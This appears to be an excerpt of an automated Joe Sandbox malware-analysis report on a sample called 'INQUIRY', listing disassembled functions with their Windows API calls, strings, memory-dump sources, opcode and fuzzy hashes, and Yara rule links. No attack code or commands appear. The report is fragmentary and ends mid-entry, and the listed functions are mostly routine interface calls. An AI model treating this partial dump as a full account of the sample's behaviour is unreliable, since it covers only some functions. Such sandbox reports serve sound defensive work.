                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 641708696-0
                                                                                              • Opcode ID: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
                                                                                              • Instruction ID: 219e2c04309a22502eb86b8264f32c7c3dfde67b150f8d2e62540f85e315851f
                                                                                              • Opcode Fuzzy Hash: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
                                                                                              • Instruction Fuzzy Hash: B0617D35A11A00DFCB35DF64D948B6977F2FB84312F14462AE5428A970CB71ECA2EB90
                                                                                              Function 00A121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A121D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
                                                                                              • Instruction ID: 1aeda6dddf11300c68c85a9f2d35690170c74bc8f2558a4c292cc9bdc0234cea
                                                                                              • Opcode Fuzzy Hash: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
                                                                                              • Instruction Fuzzy Hash: AD417035200140AEDB259F68DC88BFD3B65EB46331F284366FE658A1E5CB31CC92DB61
                                                                                              Function 00A7A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?,00A9F910), ref: 00A7A90B
                                                                                              • GetDriveTypeW.KERNEL32(00000061,00AC89A0,00000061), ref: 00A7A9D5
                                                                                              • _wcscpy.LIBCMT ref: 00A7A9FF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2820617543-1000479233
                                                                                              • Opcode ID: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
                                                                                              • Instruction ID: 3e4a6fd2320dfc619dc59e110375144f9c497cc1e6a4a86a8181914115528a85
                                                                                              • Opcode Fuzzy Hash: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
                                                                                              • Instruction Fuzzy Hash: 3D518B31508301ABC704EF14CEA2AAFB7A5FFD4380F55882DF59A572A2DB319949CB53
                                                                                              Function 00A19837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __i64tow__itow__swprintf
                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                              • API String ID: 421087845-2263619337
                                                                                              • Opcode ID: f38e01bf92a7c3550282e9651f2567de9f17dc8f204046b622af099115da0cee
                                                                                              • Instruction ID: 685ce78a663c3503e05894df9ecf19bedbc46e52135ec4c5005e06456faa932f
                                                                                              • Opcode Fuzzy Hash: f38e01bf92a7c3550282e9651f2567de9f17dc8f204046b622af099115da0cee
                                                                                              • Instruction Fuzzy Hash: 5641C275A04205AFEB24DF74D952EBAB3F8FF45300F20486EF54AD7292EA319981CB11
                                                                                              Function 00A97152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A9716A
                                                                                              • CreateMenu.USER32 ref: 00A97185
                                                                                              • SetMenu.USER32(?,00000000), ref: 00A97194
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97221
                                                                                              • IsMenu.USER32(?), ref: 00A97237
                                                                                              • CreatePopupMenu.USER32 ref: 00A97241
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A9726E
                                                                                              • DrawMenuBar.USER32 ref: 00A97276
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 176399719-3044882817
                                                                                              • Opcode ID: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
                                                                                              • Instruction ID: 1aa24da0c60ccd1437857dfe92c1cd5405e4ed47ac68ce129c1be1346c7c8e2d
                                                                                              • Opcode Fuzzy Hash: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
                                                                                              • Instruction Fuzzy Hash: 81412374A11209EFDB20DFA4D984EDABBF5FB49310F14002AF905AB361DB31A910DBA0
                                                                                              Function 00A974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A9755E
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00A97565
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A97578
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A97580
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9758B
                                                                                              • DeleteDC.GDI32(00000000), ref: 00A97594
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00A9759E
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A975B2
                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A975BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                              • String ID: static
                                                                                              • API String ID: 2559357485-2160076837
                                                                                              • Opcode ID: e7763bbd113ff16b12a2a1fa74323c01964edef75da2d9217c5f92f17dd3aa7e
                                                                                              • Instruction ID: 6206efea90b50aaea2113b254891b9d2fa4c30b48f8b6d2be4e76d31d8b5e70d
                                                                                              • Opcode Fuzzy Hash: e7763bbd113ff16b12a2a1fa74323c01964edef75da2d9217c5f92f17dd3aa7e
                                                                                              • Instruction Fuzzy Hash: AF316B72215215BFDF129FA4DC49FDA3BA9FF09360F150225FA15E60A0DB31D822DBA4
                                                                                              Function 00A36E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A36E3E
                                                                                                • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
                                                                                              • __gmtime64_s.LIBCMT ref: 00A36ED7
                                                                                              • __gmtime64_s.LIBCMT ref: 00A36F0D
                                                                                              • __gmtime64_s.LIBCMT ref: 00A36F2A
                                                                                              • __allrem.LIBCMT ref: 00A36F80
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36F9C
                                                                                              • __allrem.LIBCMT ref: 00A36FB3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36FD1
                                                                                              • __allrem.LIBCMT ref: 00A36FE8
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A37006
                                                                                              • __invoke_watson.LIBCMT ref: 00A37077
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                              • String ID:
                                                                                              • API String ID: 384356119-0
                                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                              • Instruction ID: 4a24588d7cd50b7c62f5e55fb6255880a20605ec8ba3a436c0a003d902a75baa
                                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                              • Instruction Fuzzy Hash: F97117B6A00717BBEB24EF68DD81B5AB3B8AF45364F148239F514D7281E770DE048B90
                                                                                              Function 00A72527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A72542
                                                                                              • GetMenuItemInfoW.USER32(00AD5890,000000FF,00000000,00000030), ref: 00A725A3
                                                                                              • SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A725D9
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00A725EB
                                                                                              • GetMenuItemCount.USER32(?), ref: 00A7262F
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A7264B
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00A72675
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00A726BA
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A72700
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72714
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72735
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4176008265-0
                                                                                              • Opcode ID: d49b3712164202585209bfd55434108d5765aa18651b1f855132134e9037a1dd
                                                                                              • Instruction ID: bf621677b2a46aee5e851f0585af41d60082f87500d1ab4416937b380e8e5f93
                                                                                              • Opcode Fuzzy Hash: d49b3712164202585209bfd55434108d5765aa18651b1f855132134e9037a1dd
                                                                                              • Instruction Fuzzy Hash: 57619170900249AFDB15CFA4DD84EBE7BB8EB45344F14C16AE846A3251D731AD06DB20
                                                                                              Function 00A96F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A96FA5
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A96FA8
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A96FCC
                                                                                              • _memset.LIBCMT ref: 00A96FDD
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A96FEF
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A97067
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 830647256-0
                                                                                              • Opcode ID: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
                                                                                              • Instruction ID: 1b46538f314bf83ecdd98df9e31a2349b2a4bbd6bd0e64aa22bfa0368d115ee2
                                                                                              • Opcode Fuzzy Hash: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
                                                                                              • Instruction Fuzzy Hash: A7615D75A00208AFDB11DFA4CD81EEE77F8EF09710F10415AFA15AB2A1C771AD45DBA0
                                                                                              Function 00A66B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A66BBF
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00A66C18
                                                                                              • VariantInit.OLEAUT32(?), ref: 00A66C2A
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A66C4A
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00A66C9D
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A66CB1
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A66CC6
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00A66CD3
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CDC
                                                                                              • VariantClear.OLEAUT32(?), ref: 00A66CEE
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
                                                                                              • Instruction ID: d305578a48a9b8f1225d4c282b1c4955b8dd4839a3c85784d6cd63d90dfe714c
                                                                                              • Opcode Fuzzy Hash: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
                                                                                              • Instruction Fuzzy Hash: E2413075A00219DFCF04DFA9D9849EEBBB9FF48354F008069E955E7261DB30A946CF90
                                                                                              Function 00A85732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00A85793
                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 00A857D8
                                                                                              • gethostbyname.WSOCK32(?), ref: 00A857E4
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00A857F2
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85862
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85878
                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A858ED
                                                                                              • WSACleanup.WSOCK32 ref: 00A858F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: 1ec8b61b9d13486275ddbd6aac6172ba31ca661aecabb20b2a6c7d6e52088c2f
                                                                                              • Instruction ID: 617cf4d64d02e5d27a32bc9c988372eb50cbdb74588ba36398e8b67af457c042
                                                                                              • Opcode Fuzzy Hash: 1ec8b61b9d13486275ddbd6aac6172ba31ca661aecabb20b2a6c7d6e52088c2f
                                                                                              • Instruction Fuzzy Hash: 80518E31A04600DFDB10EF75DD45B6A77E4EF48710F14492AF996DB2A1DB30E941DB42
                                                                                              Function 00A7B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7B4D0
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A7B546
                                                                                              • GetLastError.KERNEL32 ref: 00A7B550
                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00A7B5BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: b359df8cc0d0077cd2e6b46b74ac7002ac823c2d7be59b0b51c166a655b218e1
                                                                                              • Instruction ID: e9bfa501610df7f79a8cf824cb03f36d7c796f626d9cb3ced3af8ce0ed80e39e
                                                                                              • Opcode Fuzzy Hash: b359df8cc0d0077cd2e6b46b74ac7002ac823c2d7be59b0b51c166a655b218e1
                                                                                              • Instruction Fuzzy Hash: 8D316375A00205EFCB00DB68CD45FAE7BB4FF48311F14C166E50ADB291DB719A46CB61
                                                                                              Function 00A68F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A69014
                                                                                              • GetDlgCtrlID.USER32 ref: 00A6901F
                                                                                              • GetParent.USER32 ref: 00A6903B
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A6903E
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00A69047
                                                                                              • GetParent.USER32(?), ref: 00A69063
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A69066
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: c6f8087827f87e3aed7d2d2e773a468cb959810f44312859327ee779d25ea448
                                                                                              • Instruction ID: 352b19e635cd9b416f0f5125c6d596c0c3d4ef9a2f472dd86f905a953efe8052
                                                                                              • Opcode Fuzzy Hash: c6f8087827f87e3aed7d2d2e773a468cb959810f44312859327ee779d25ea448
                                                                                              • Instruction Fuzzy Hash: 5A21B374A00208BFDF05EBA0CC85EFEBBB9EF59310F10415ABA619B2A1DF755855DB20
                                                                                              Function 00A6907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                                • Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC
                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A690FD
                                                                                              • GetDlgCtrlID.USER32 ref: 00A69108
                                                                                              • GetParent.USER32 ref: 00A69124
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A69127
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00A69130
                                                                                              • GetParent.USER32(?), ref: 00A6914C
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A6914F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
